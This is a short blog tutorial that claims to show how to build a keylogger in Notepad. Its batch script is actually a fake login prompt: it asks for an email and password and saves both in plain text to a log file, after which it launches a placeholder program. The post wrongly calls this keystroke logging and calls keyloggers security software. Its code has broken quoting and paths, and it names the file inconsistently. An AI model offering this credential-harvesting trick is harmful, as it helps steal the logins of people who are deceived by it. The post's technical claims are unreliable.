How To Create Keylogger With Normal Notepad
Keylogger is a secuirty software that has the ability to record every keystroke you make to a log file, usually encrypted. Every type of keylogger is dangerous as they can record your keystrokes, tracks your activity and can record the open sites. By this, your any account can be easily hacked by the hackers. These keyloggers can detect your bank accounts passwords too. And these type of keylogger can also be created with the notepad text editor.  
Today i will showing you some tips on how to create a keylogger for your safety only and to know how it works to prevent damage. Follow the procedures below.

How To Create Keylogger With Normal Notepad

The method is very simple and easy and you don’t need any tool to do this but just a notepad to perform the task. So just follow the post below to proceed.

Creating Keylogger With Notepad:

Step 1. Firstly, you need to open notepad in your windows by pressing Window button and then selecting the notepad from the optionsNow in notepad copy and paste the below code in it.
@echo off
color a
title Login
cls
echo Please Enter Your Email Address And Password
echo.
echo.
cd “C:Logs”
set /p user=Username:
set /p pass=Password:
echo Username=”%user%” Password=”%pass%” >> Log.txt
start >>Program Here<<
exit
Creating Keylogger With Notepad
See the image below:
 Keylogger with Notepad -fervidtech

Step 2. Now save this file as Logs.bat on your desktop.
Step 3. Now create a new folder named logs. (Note that keylogger will only work if the folder name is logs). Cut the folder and paste it into drive C
Step 4. Now test your file Log.bat and then after entering the Username and password
Step 5. Open the folder in C drive and see all saved key logs there as a text file created there automatically.

Also read: How To Secure Rooted Android From Security Threats

That’s it! you are done, you have successfully created a keylogger in notepad.
Hope you like the post(How To Create Keylogger With Normal Notepad), don’t forget to share and leave a comment below if you have any related query.
Axact

Author

My name is Dave, Am a cool IT Geek, computer analyst and a tutor. I do alot of computer stuffs like programming, web development, blogging, data administrator, computer security and lots more. Feel free to contact me if want more informations and tutorials.

Post A Comment:

0 comments: